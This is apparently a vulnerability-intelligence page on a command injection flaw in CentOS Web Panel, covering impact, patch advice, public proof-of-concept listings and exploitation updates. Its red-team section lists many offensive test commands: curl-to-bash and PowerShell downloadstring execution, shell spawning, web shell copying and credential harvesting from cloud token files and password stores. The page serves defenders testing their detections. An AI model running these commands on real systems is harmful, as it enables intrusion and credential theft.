CVE-2025-48703
Overview
This vulnerability is a command injection flaw rooted in improper input validation of the t_total parameter within the filemanager changePerm functionality of CentOS Web Panel. The affected component fails to sanitize shell metacharacters, enabling injection of arbitrary shell commands. The flaw specifically impacts the HTTP POST request handling in the file management module of CentOS Web Panel versions prior to 0.9.8.1205.
Vulnerability Description
CWP (aka Control Web Panel or CentOS Web Panel) before 0.9.8.1205 allows unauthenticated remote code execution via shell metacharacters in the t_total parameter in a filemanager changePerm request. A valid non-root username must be known.
Impact
An attacker who knows a valid non-root username can execute arbitrary shell commands remotely without authentication, potentially gaining control over the affected system. This enables unauthorized access to sensitive data, system manipulation, and full compromise of the server hosting CentOS Web Panel. The vulnerability facilitates lateral movement and persistent footholds in enterprise environments relying on this panel for server management.
Solution
Upgrade CentOS Web Panel to version 0.9.8.1205 or later, where this command injection vulnerability is addressed. Refer to the vendor's advisory and patch instructions available at https://fenrisk.com/rce-centos-webpanel for detailed remediation steps. No official workaround is documented; applying the update is the recommended course of action to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Control Web Panel, specifically in versions prior to 0.9.8.1205, presents a critical risk due to its allowance for unauthenticated remote code execution. This flaw arises from improper handling of user input in the file manager's change permission request, particularly through the t_total parameter. Attackers can exploit this vulnerability by injecting shell metacharacters, which can lead to arbitrary command execution on the server. The requirement for a valid non-root username to be known adds a layer of complexity to the attack, as it necessitates some level of reconnaissance or prior knowledge about the target environment.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage web-based interfaces to send crafted requests that include malicious payloads in the t_total parameter. Given that the vulnerability allows for unauthenticated access, an attacker does not need to authenticate themselves to execute commands on the server. This makes it particularly dangerous, as it lowers the barrier to entry for potential attackers. Scenarios may include deploying malware, creating backdoors, or manipulating server configurations to facilitate further attacks, such as data exfiltration or lateral movement within a network.
The real-world impact of this vulnerability can be significant for organizations using Control Web Panel. With a CVSS score of 9.0, it falls into the critical category, indicating that successful exploitation could lead to severe consequences. Businesses may face operational disruptions, data breaches, and reputational damage. The ability to execute arbitrary code remotely means that attackers could gain full control over affected systems, potentially leading to the compromise of sensitive data or the deployment of ransomware. The financial implications could be substantial, not only due to immediate remediation costs but also from potential regulatory fines and loss of customer trust.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating the Control Web Panel to the latest version is essential, as this will patch the vulnerability and close the window of opportunity for attackers. Additionally, implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the server. Monitoring logs for unusual activity, such as unexpected changes in file permissions or unauthorized access attempts, can also aid in early detection of exploitation attempts. Furthermore, organizations should conduct regular security assessments and penetration testing to identify and address vulnerabilities proactively, ensuring that their security posture remains robust against evolving threats.
In conclusion, the vulnerability in Control Web Panel represents a serious threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and the real-world implications of exploitation, businesses can better prepare themselves to defend against such threats. Implementing effective detection and mitigation strategies will not only protect their systems but also safeguard their reputation and customer trust in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-48703, coinciding with its recent addition to the Known Exploited Vulnerabilities (KEV) catalog. This development is underscored by an upward trend in our telemetry indicating increased attacker interest and activity leveraging the unauthenticated remote code execution flaw in Control Web Panel’s filemanager module. The elevated EPSS score further corroborates the rising likelihood of successful exploitation in the wild. Notably, new proof-of-concept exploits have surfaced publicly, lowering the barrier for adversaries to weaponize this vulnerability. For defenders, this surge signifies an urgent shift in the threat landscape, where opportunistic attackers may rapidly move from reconnaissance to active exploitation. Consequently, the risk level associated with CVE-2025-48703 has intensified from a theoretical concern to a tangible and immediate threat, demanding heightened vigilance in detection and response efforts.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-48703, reflected by a discernible uptick in telemetry signals. This increase, while moderate, signals growing adversary interest and potentially expanding operational use of the vulnerability. Concurrently, the persistence of multiple publicly available proof-of-concept exploits continues to lower the technical barrier for threat actors, facilitating broader and more rapid weaponization. Although ransomware involvement remains unconfirmed, the heightened exploitation activity elevates the risk profile, indicating a shift from opportunistic probing toward more deliberate and sustained attack campaigns. For defenders, this evolving landscape underscores an increased urgency to monitor for exploitation indicators and reinforces the criticality of timely patch application. Consequently, the threat level associated with CVE-2025-48703 has intensified, warranting elevated prioritization within vulnerability management and incident response frameworks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Control-Webpanel | Webpanel | All |
cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Skynoxk/CVE-2025-48703
Remote Code execution in CentOS web panel
|
Skynoxk | 3 | 1 | 2025-06-26 | View |
|
ftz7/PoC-CVE-2025-48703
CVE-2025-48703 é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo filemanager de um painel de hospedagem...
|
ftz7 | 2 | 0 | 2025-11-11 | View |
|
itstarsec/CVE-2025-48703
CVE-2025-48703 là lỗ hổng mức độ nghiêm trọng trong CentOS Web Panel (CWP) cho phép kẻ tấn công không xác thực (unauthen...
|
itstarsec | 0 | 0 | 2025-08-01 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
41%
|
High | High | |
| CAPEC-6 | Argument Injection |
40%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-48703 |
| fenrisk.com |
GitHub CVE
|
https://fenrisk.com/rce-centos-webpanel |
| control-webpanel.com |
NVD API
Release Notes
|
https://control-webpanel.com/changelog |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48703 |